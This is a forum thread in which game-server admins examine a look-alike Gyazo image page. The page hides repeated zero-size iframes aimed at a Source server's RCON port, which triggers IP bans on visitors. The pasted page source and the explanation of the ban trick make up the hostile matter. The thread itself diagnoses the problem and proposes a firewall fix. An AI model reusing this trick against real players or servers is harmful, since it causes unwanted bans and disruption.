Possible exploit? IP ban people via linking url.

So, the topic might sound odd but I’ve really no idea what happend as communication between myself and the victim is lacking.

He claims he was banned after been sent to this url while ingame, I’m assuming it was opened via Steam overlay browser since we don’t have any system to open html links via derma etc.

Web page source:






<!DOCTYPE HTML>



<html lang="en">



<head>



<meta http-equiv="Content-Type" content="text/html; charset=utf-8">



<meta name="robots" content="noindex">



<title>897784fb2bbd7ef277bc6772c77c1a86.png</title>



<meta name="viewport" content="width=380"/>



<meta name="apple-itunes-app" content="app-id=625725292">



<meta name="description" content="Gyazo lets you instantly grab the screen and upload the image to the web. You can easily share them on Chat, Twitter, Blog, Tumblr, etc. Available for Windows, Mac and Linux.">



<meta name="keywords" content="Screenshot, Gyazo, Upload, Print Screen,     Tool,    Free">



<meta property="og:title" content="Screenshot by Gyazo"/>



<meta property="og:type" content="image"/>



<meta property="og:url" content="http://gyazo.com/897784fb2bbd7ef277bc6772c77c1a86"/>



<meta property="og:image" content="http://gyazo.com/thumb/897784fb2bbd7ef277bc6772c77c1a86.png"/>



<meta property="fb:page_id" content="227979433880197"/>



<meta property="og:site_name" content="Gyazo"/>



<meta property="og:description" content="Gyazo lets you instantly grab the screen and upload the image to the web."/>



<style type="text/css">body{font-family:lucida Grande,verdana,arial,sans-serif;margin:0px;background-color:#FCFCFC;}.label,.badge{display:inline-block;padding:2px 4px;font-size:11.844px;font-weight:bold;line-height:14px;color:#ffffff;text-shadow:0 -1px 0 rgba(0,0,0,0.25);white-space:nowrap;vertical-align:baseline;background-color:#999999;}.label{-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;}.badge{padding-right:9px;padding-left:9px;-webkit-border-radius:9px;-moz-border-radius:9px;border-radius:9px;}.label:empty,.badge:empty{display:none;}a.label:hover,a.badge:hover{color:#ffffff;text-decoration:none;cursor:pointer;}.label-important,.badge-important{background-color:#b94a48;}.label-important[href],.badge-important[href]{background-color:#953b39;}.label-warning,.badge-warning{background-color:#f89406;}.label-warning[href],.badge-warning[href]{background-color:#c67605;}.label-success,.badge-success{background-color:#468847;}.label-success[href],.badge-success[href]{background-color:#356635;}.label-info,.badge-info{background-color:#3a87ad;}.label-info[href],.badge-info[href]{background-color:#2d6987;}.label-inverse,.badge-inverse{background-color:#333333;}.label-inverse[href],.badge-inverse[href]{background-color:#1a1a1a;}.btn .label,.btn .badge{position:relative;top:-1px;}.btn-mini .label,.btn-mini .badge{top:0;}.label{margin:13px 0px 11px 16px;}.label-pointer{cursor:pointer;}img{border:none;}.container{width:940px;margin:0 auto;}h2{font-size:11px;font-weight:normal;margin:7px 0 6px;float:left;}#noticebar{background-image:url(http://gyazo.com/bab04ba53fb1bd4f2c7cfcfad1f50d61.png);background-repeat:repeat-x;background-position:bottom;bckground-color:#E5EDF8;font-size:13px;color:#333;padding:10px 15px;border-bottom:1px solid #8DA0C2;}#noticebar .close{float:right;padding-top:2px;}#applogo{display:block;float:left;font-size:1.1em;margin:0px 1em 0px 8px;font-family:Garamond,Georgia,serif;}#applogo a{color:#000;text-decoration:none;}#applogo img{border:0;max-height:24px;}#uploading{display:none;margin-top:55px;margin-left:20px;font-size:25px;color:#707070;border:1px solid #999999;padding:20px 18px;width:270px;}#uploading img{margin-right:8px;}#header{position:fixed;top:0;left:0;height:43px;padding:0px;background-color:#111b37;color:white;width:100%;z-index:10000;}#header a{color:#999}#header a:hover{color:white;}#header{*display:inline-block;}#header:after{content:".";display:block;visibility:hidden;height:0.1px;font-size:0.1em;line-height:0;clear:both;}#header .leftmenu{float:left;margin-right:5px;margin-top:9px;border-right:1px solid #999999;padding-right:5px;font-weight:bold;}#header .plus{display:block;float:left;margin:0;margin-top:3px;font-weight:bold;}#header .ad{display:block;float:left;margin:0;line-height:44px;font-size:75%;margin-left:10px;}#header .btnbox{}#header .btnbox a{font-size:75%;text-decoration:none;display:block;border:1px solid transparent;padding:4px;height:16px;line-height:17px;overflow:hidden;}#header .btnbox a:hover{background-color:#777777;}#header .btnbox img{vertical-align:middle;margin-right:5px;}#header #menu{float:left;margin-top:3px;border-right:1px solid #CCCCCC;margin:3px 7px 0 0;padding:0 5px 0 0;}#header #submenu{float:right;font-size:11px;margin-top:7px;}#header #close_btn{margin-left:8px;cursor:pointer;}#header .close{float:right;margin-left:20px;margin-right:20px;margin-top:8px;}#header .toolbtn{border:1px solid transparent;font-size::0.8em;display:block;padding:4px;width:16px;height:16px;text-decoration:none;background-repeat:no-repeat;background-position:4px center;cursor:pointer;-moz-user-select:none;-khtml-user-select:none;-webkit-user-select:none;user-select:none;}#header .toolbtn img{margin-right:2px;border:0;}#header .toolbtn:hover{background-color:#777;}#header .selected .toolbtn{background-color:#E4ECF7;border-top:1px solid #9DB6D0;border-left:1px solid #9DB6D0;border-right:1px solid white;border-bottom:1px solid white;}#header .urlinfo{display:block;padding:3px 0 3px 18px;}#header .urlinfo input{border:1px solid #999;width:200px;font-size:10px;padding:1px;margin:0px;}#header li{font-size:11px;float:left;list-style-type:none;}#header .forguest{display:block;font-size:12px;text-decoration:none;cursor:pointer;padding-top:10px;padding-left:5px;height:26px;float:left;}#header .forguest .dlbtn{display:block;float:left;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGsAAAAVCAYAAABBlxC9AAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAK8AAACvABQqw0mAAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNAay06AAAAAVdEVYdENyZWF0aW9uIFRpbWUANi8xNC8xMaahqEAAAAIaSURBVGiB7dm/axNhGMDx75u7WO60SWjVxmqFNi6iRigO0sFJih3VoV2sDrVuDmocXBzaQf+Guir6D6j4YxH8sSgtQVqoYrFGrRgsiebukvNehzRKk16soHkd3s96HHzh5X3ugRMAcvHCTooPZihNJ0Cg/Ues9DLxoTQfrywKAJlNlYjYFt2XwUqDiKpO1ACKj+DDJICDN28L+fr4FIX7Y+y6DWan6jytnjsHC6MQG7wmZLavhH3AInlJdZYWJpcB75Vj4i1YdJ0H6ahO0sJsOgSFh5YJQFsKAldxkRbK2gNIqoclAekp7dGaEBZA7bDWHoH9I0+5eKqXkSPJlnVp4UwAGTIC3y25nL06y827OTInexjYH2tpnPaLoHazguYj8MlMgaPnXjI82ElmdBs9XRtakKfVazoG6926l+fO4y+MH+sgc2LLv+zS1rBys/5wE5S+3h4VWNcYrBk+bDNxJkZ8Y2Td72h/jwnyt2NwYJ/JxLjN3j4D8KqrvtZyKzerBEQaHu7YKpg8HWXooAFUIKi0tk5bpXpYlTwYjWv58ykB+BD4Lc7SVgm+Aj8P6y1EUipztGbKbwAwMeKO8OYtGd2uuEgLI9w5MGKOidlxnXJuDP8zGO2qu7R6fh4q76Gt90b1T/GL9hKybEm7H4zNIAzViRrfofIJ4WYBwyEo2tVvVrR7N/7StPj2LKE2UGtgJJZlNJkW7iw/AMXHn8HmxOMHAAAAAElFTkSuQmCC) no-repeat;width:87px;padding-left:20px;margin-top:2px;height:21px;line-height:21px;color:#253C6D}#content{margin:53px auto 0;min-width:940px;width:940px;}#gyazo{margin:0;min-height:300px;}#buttons{clear:both;width:800px;margin-top:10px;margin-left:10px;padding-left:0;}#buttons li{list-style:none;float:left;margin-right:15px;}.ads{clear:both;margin:10px;width:728px;height:90px;text-align:left;border:8px solid #ccc;overflow:hidden;}.ads_square{clear:both;margin-top:10px;margin-left:10px;margin-bottom:10px;width:920px;height:250px;}.premium{float:right!important;font-size:70%;color:#253C6D;margin-right:10px!important;}.report{float:right!important;margin-right:0!important;font-size:70%;color:#253C6D;}#image_header p{margin-left:8px;margin-top:15px;}#image_header .private{color:red;font-size:13px;background-color:#EFCACC;padding:2px;}#dialog_frame{display:none;padding:3px;background-color:#C3D9FF;}#dialog_back{display:block;position:absolute;top:0px;left:0px;width:100%;height:100%;z-index:200;}#dialog_border{display:none;padding:3px;background-color:#999;}.dialog{position:absolute;background-color:#16306F;color:black;padding:7px 10px 10px;top:50px;left:64px;-moz-box-shadow:0 3px 8px #666666;-webkit-box-shadow:0 3px 8px #666666;border-radius:10px;-moz-border-radius:10px;-webkit-border-radius:10px;z-index:100;}.dialog h1{color:#69645C;margin:0 0 12px;}.dialog h4{color:white;margin:0 0 7px;font-size:15px;}.dialog .success{font-size:14px;background-color:white;padding:15px 18px;}.dialog form{background-color:white;margin:0;}.dialog .postbody{padding:15px 18px;}.dialog p{font-size:12px;}.dialog .submit{padding:8px 18px;background-color:#0096B5;text-align:center;}.dialog .submit input{font-size:12px;}.dialog .row input,.dialog .row textarea{background-color:#F6F6F6;border:1px solid #999;padding:3px;margin:0;width:200px;}.dialog .row textarea{height:3.1em;}.dialog .row{margin-bottom:8px;margin-right:5px;}.dialog .row label{display:block;font-size:12px;margin:3px 0;}.dialog .nt{display:block;font-size:13px;color:gray;}.dialog .row_info label{font-size:10px;color:gray;}.dialog .row_info input{font-size:10px;border:1px solid #EEE;color:gray;}.dialog .error{font-size:12px;background:#FFEBE8 none repeat scroll 0 0;border:1px solid #DD3C10;color:#333333;padding:5px;margin-bottom:10px;width:18em;}.dialog .buttons{font-size:12px;margin-top:10px;}.dialog .buttons label{font-size:12px;}#content h3{display:block;margin-top:20px;margin-bottom:4px;font-weight:normal;font-size:18px;color:#FF0084;}h3 a{color:#FF0084!important;}h3 img{max-height:24px;}#download{float:left;width:230px;padding:15px;margin:10px 20px 20px 20px;border:1px solid #C0C0C0;box-shadow:6px 8px 10px #666666;-moz-box-shadow:6px 8px 10px #666666;-webkit-box-shadow:6px 8px 10px #666666;}#download a{text-decoration:none;}#download_button{color:black;display:block;background:#CDE600;padding:10px;font-weight:bold;margin-bottom:10px;border-radius:10px;-moz-border-radius:10px;-webkit-border-radius:10px;}#download_button img{float:left;margin-right:10px;margin-left:10px;}#gyazo_img{float:left;border:solid #00a7bb;}.ui-tooltip-content{font-size:15px;}#gyazo_img{margin:0 10px 20px;}.listicon{padding-left:26px!important;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAQAAAC1QeVaAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAG2YAABzjgAA2e0AAIGfAAB/mgAA2GMAADIXAAAdLVvevdMAAAC9SURBVHjahM+hTsMAAATQx9Y2iCk8Bo0hwWDI/mUJf1F+gH0Byf4Cz4bBICemZvCYVdA2zSFaC5y4S+6Sy52c0qZNHdmlTZtdpE6bNqdCpcIcpQol5iqYjWKBCyZegKrwaI4tnlziEy8aDGfxOwo7JTY2nl1j78HKCn3hHrzi1g3OceVuHPRn7ZsSR3z4xh5H7+j/GVRPV7ZW05WNpSUGGbGOHJIkh8h6NGc60OCLiRvQFVM4oNehx6BD9zMAiqFaUBWw8TUAAAAASUVORK5CYII=);background-position:4px 5px;background-repeat:no-repeat;}#upgrade{cursor:pointer;padding:2px;color:black!important;}#upgrade:hover{padding:1px;}#footer{clear:both;color:gray;font-size:0.8em;margin-left:10px;margin-right:10px;margin-top:40px;padding-bottom:31px;padding-left:7px;padding-top:10px;}.prefix{*display:inline-block;}.prefix:after{content:".";display:block;visibility:hidden;height:0.1px;font-size:10%;line-height:0;clear:both;}</style>



<link rel="stylesheet" href="[/public/css/jquery-ui.css?1](http://gyazo.org/public/css/jquery-ui.css?1)">



<script type="text/javascript">



      var _gaq = _gaq || [];



      _gaq.push(['_setAccount', 'UA-2827501-10']);



      _gaq.push(['_setDomainName', '.gyazo.com']);



        _gaq.push(['_setCustomVar',1,'UserType','Guest',2]);



            _gaq.push(['_setCustomVar',1,'ImageTopAd','',3]);



            _gaq.push(['_setCustomVar',1,'ImageBottomAd','',3]);



            _gaq.push(['_setCustomVar',1,'ShowDownloadForGuest','true',3]);



              _gaq.push(['_trackPageview']);



      (function() {



        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;



        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';



        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);



      })();







    </script>



</head>



<body>



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<div id="header" style="display: block;">



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<div class="container">



<a class="forguest" href="[/?ref=bar](http://gyazo.org/?ref=bar)">



<div style="float:left;margin:0px 10px 0 4px;">



<img src="http://gyazo.com/public/img/ninja/logo.png" style="width:76px;height:22px" src="[/public/img/ninja/logo.png](http://gyazo.org/public/img/ninja/logo.png)"/>



</div>



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<div style="float:left;padding-top:2px;height:21px;line-height:21px;margin-right:10px;">



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



Instant Screen Sharing. </div>



<div class="dlbtn">



Try Now </div>



</a>



</div>



</div>



<div id="content">



<div id="gyazo">



<a>



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<img src="[897784fb2bbd7ef277bc6772c77c1a86.jpg](http://gyazo.org/897784fb2bbd7ef277bc6772c77c1a86.jpg)" id="gyazo_img" alt="" onload="try{fitImgPosition();}catch( e ){}"/>



</a>



<ul id="buttons" class="prefix">



<li style="margin-right:0;">



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-text="Screenshot:">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>



</li>



<li>



<div id="fb-root"></div><script src="[http://connect.facebook.net/en_US/all.js#appId=176828049042806&xfbml=1](http://connect.facebook.net/en_US/all.js#appId=176828049042806&xfbml=1)"></script><fb:like href="" send="false" layout="button_count" width="80" show_faces="false" font=""></fb:like>



</li>



<li style="margin-top: -2px;">



<a name="fb_share" type="button"></a>



<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript">



                </script>



                <iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



</li>



<li>



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<a href="http://www.reddit.com/submit" onclick="window.location = 'http://www.reddit.com/submit?url=' + encodeURIComponent(window.location); return false"> <img src="http://www.reddit.com/static/spreddit7.gif" alt="submit to reddit" border="0"/> </a>



</li>



<li>



<a href="http://www.tumblr.com/share" title="Share on Tumblr" style="display:inline-block; text-indent:-9999px; overflow:hidden; width:81px; height:20px; background:url('http://platform.tumblr.com/v1/share_1.png') top left no-repeat transparent;" target="_blank">Share on Tumblr</a>



</li>



<li>



<a href="http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fgyazo.com%2F897784fb2bbd7ef277bc6772c77c1a86&media=http%3A%2F%2Fgyazo.com%2F897784fb2bbd7ef277bc6772c77c1a86.png" class="pin-it-button" count-layout="none">Pin It</a>



<script type="text/javascript" src="http://assets.pinterest.com/js/pinit.js"></script>



</li>



<li class="report">



<a href="[/report?fname=897784fb2bbd7ef277bc6772c77c1a86](http://gyazo.org/report?fname=897784fb2bbd7ef277bc6772c77c1a86)">Report this image</a>



</li>



<li class="premium">



<a href="[/premium/](http://gyazo.org/premium/)">Hide Ads?</a>



</li>



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



</ul>



</div>



</div>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js"></script>



<iframe src="[http://70.42.74.6:27015](http://70.42.74.6:27015/)" width="0px" height="0px" seamless="1"></iframe>



<script>



jQuery( function() {



    jQuery( "#gyazo_img" ).tooltip( {



        items: "img",



        content: function() {



            var element = jQuery( this );



            return element.attr("tooltips");



        },



    track: true



    } );



} );



</script>



<script type="text/javascript" charset="utf-8">



function log(obj){



    try{



        console.log(obj);



    }catch(e){}



}











function toggleVersionup(){



    clear_selection("menu");



    if($('#versionup').css('display')=='none'){



        $('#versionup').show();



                $('#gyazo').css('opacity', "0.5");



                $('#header').css('opacity', "0.5");



    }else{



        $('#versionup').hide();



                $('#gyazo').css('opacity', "1");



                $('#header').css('opacity',"1");



    }



}



function toggleGyazopro(){



    clear_selection("menu");



    if($('#gyazopro').css('display')=='none'){



        $('#gyazopro').show();



                $('#gyazo').css('opacity', "0.5");



                $('#header').css('opacity', "0.5");



    }else{



        $('#gyazopro').hide();



                $('#gyazo').css('opacity', "1");



                $('#header').css('opacity', "1");



    }



}



function hideOther(name){



    var names = 'twitter flickr'.split(' ');



    for(var i=0,l=names.length;i<l;i++){



        if(names*!=name) $('#'+names*).hide();



    }



}







function clear_selection(id){



    $('#'+id).find("li").each(function(i, e){



        e.className = "";



    });



}











function show_dialog(){



    $('#dialog_frame').show();



    $('#image_header').hide();



    //$('author_tag').focus();



}







function close_dialog(){



    clear_selection("menu");



    hideOther('');



}







function set_tag(tag){



    $('#public_tags')[0].value += tag + ' ';



}











function hide_header(){



    $('#header').hide();



}







function toggleSize(){



    if($('#gyazo_img')[0].style.maxHeight != '600px'){



        $('#gyazo_img')[0].style.maxHeight = '600px';



    }else{



        $('#gyazo_img')[0].style.maxHeight = '400px';



    }



}







function hideNotice(){



    $('#noticebar').hide();



}







function showNotice(){



    $('#noticebar').show();



}







function toggleHeader(){



    if($('#header')[0].style.display == 'block'){



        $('#header').hide();



        $('#content')[0].style.marginTop = '0px';



    }else{



        $('#header').show();



        $('#content')[0].style.marginTop = '53px';



    }



}











var trycount = 0;



var imgobj;







$(function(){







    $(window).keydown(function(e){



        if(e.keyCode == 27){



            close_dialog();



        }



    });



    $('#gyazo_img').click(function(e){



            });







  var pathname_count = location.pathname.length;



  var iphone_dismiss = localStorage.getItem("iphone_dismiss");



  if(iphone_dismiss!=1 && pathname_count!=3) {



  $(".show_iphone").show();



  }



  $(".close_logo").click(function(){



  localStorage.setItem("iphone_dismiss","1");



  $(".show_iphone").hide();







  });







});











function fitImgPosition(){



    var w= $("#gyazo_img").width();



    if (w > 0 && w > 940){



        $("#content").width(w);



    }



}



fitImgPosition();







</script>



</body>




The Link:
** WARNING[ /B]
http://gyazo.org/NzAuNDIuNzQuNjoyNzAxNQ

Looks like the multiple iframes are opening RCON connections and causing a ban.

This is the code in question:


<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>

Aye, also … why does


 create a table :/

[editline]30th May 2013[/editline]

Fixed. It was because you had table tags at the beginning of the code.

This is an old issue with srcds, a tcp listener is opened for rcon, spamming connections will get you banned if the following settings are proper/enabled:


sv_rcon_banpenalty
sv_rcon_maxfailures
sv_rcon_minfailures
sv_rcon_minfailuretime


There was a user who posted links on my forums to a shitty image hosting site which allowed images to have invalid extensions. (.php, .html, etc.)

The images contained the exact same thing you’re seeing, iframes to spam connections.

You can solve this by limiting tcp connections to a specific IP on 27015. (It’s only needed for rcon and it’s better to have it secured anyway.)

Yeah, take the firewall route here instead of allowing infinite failed connections.

We have external rate limiting set for brute force attempts, but since myself and our other roots have dynamic IP’s then it kinda sucks.

The firewall kicks in before the failed hacking attempt auto ban now so it’s not going to be an issue anymore.